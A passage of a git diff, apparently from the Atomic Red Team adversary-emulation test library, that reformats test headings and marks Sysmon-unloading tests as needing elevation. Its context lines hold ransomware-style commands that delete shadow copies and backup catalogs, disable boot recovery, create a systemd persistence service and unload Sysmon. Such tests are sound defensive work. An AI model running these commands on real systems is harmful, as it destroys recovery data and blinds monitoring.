-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
taskkill.exe /f /im #{process_name}
```
diff --git a/atomics/T1490/T1490.md b/atomics/T1490/T1490.md
index 6bec9449..e9102c22 100644
--- a/atomics/T1490/T1490.md
+++ b/atomics/T1490/T1490.md
@@ -28,8 +28,7 @@ Deletes Windows Volume Shadow Copies. This technique is used by numerous ransomw
**Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
vssadmin.exe delete shadows /all /quiet
```
@@ -41,8 +40,7 @@ Deletes Windows Volume Shadow Copies via WMI. This technique is used by numerous
**Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
wmic.exe shadowcopy delete
```
@@ -54,8 +52,7 @@ Deletes Windows Backup Catalog. This technique is used by numerous ransomware fa
**Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
wbadmin.exe delete catalog -quiet
```
@@ -68,8 +65,7 @@ This technique is used by numerous ransomware families and APT malware such as O
**Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
bcdedit.exe /set {default} recoveryenabled no
```
diff --git a/atomics/T1496/T1496.md b/atomics/T1496/T1496.md
index 5f2865d3..2aa909c4 100644
--- a/atomics/T1496/T1496.md
+++ b/atomics/T1496/T1496.md
@@ -18,8 +18,7 @@ End the test by using CTRL/CMD+C to break.
**Supported Platforms:** macOS, CentOS, Ubuntu, Linux
-#### Run it with `bash`!
-```
+#### Run it with `bash`! ```
yes > /dev/null
```
diff --git a/atomics/T1501/T1501.md b/atomics/T1501/T1501.md
index 94e49ede..7577b808 100644
--- a/atomics/T1501/T1501.md
+++ b/atomics/T1501/T1501.md
@@ -39,8 +39,7 @@ This test creates a Systemd service unit file and enables it as a service.
| systemd_service_path | Path to systemd service unit file | Path | /etc/systemd/system|
| systemd_service_file | File name of systemd service unit file | String | art-systemd-service.service|
-#### Run it with `bash`!
-```
+#### Run it with `bash`! ```
echo "[Unit]" > #{systemd_service_path}/#{systemd_service_file}
echo "Description=Atomic Red Team Systemd Service" >> #{systemd_service_path}/#{systemd_service_file}
echo "" >> #{systemd_service_path}/#{systemd_service_file}
@@ -74,8 +73,7 @@ This cleans up the remnants of the SystemD service unit file creation test.
| systemd_service_path | Path to systemd service unit file | Path | /etc/systemd/system|
| systemd_service_file | File name of systemd service unit file | String | art-systemd-service.service|
-#### Run it with `bash`!
-```
+#### Run it with `bash`! ```
systemctl stop #{systemd_service_file}
systemctl disable #{systemd_service_file}
rm -rf #{systemd_service_path}/#{systemd_service_file}
diff --git a/atomics/index.yaml b/atomics/index.yaml
index 5215f879..5f39b7cf 100644
--- a/atomics/index.yaml
+++ b/atomics/index.yaml
@@ -5712,6 +5712,7 @@ defense-evasion:
default: SysmonDrv
executor:
name: command_prompt
+ elevation_required: true
command: 'fltmc.exe unload #{sysmon_driver}
'
@@ -5740,6 +5741,7 @@ defense-evasion:
- windows
executor:
name: command_prompt
+ elevation_required: true
command: 'sysmon -u
'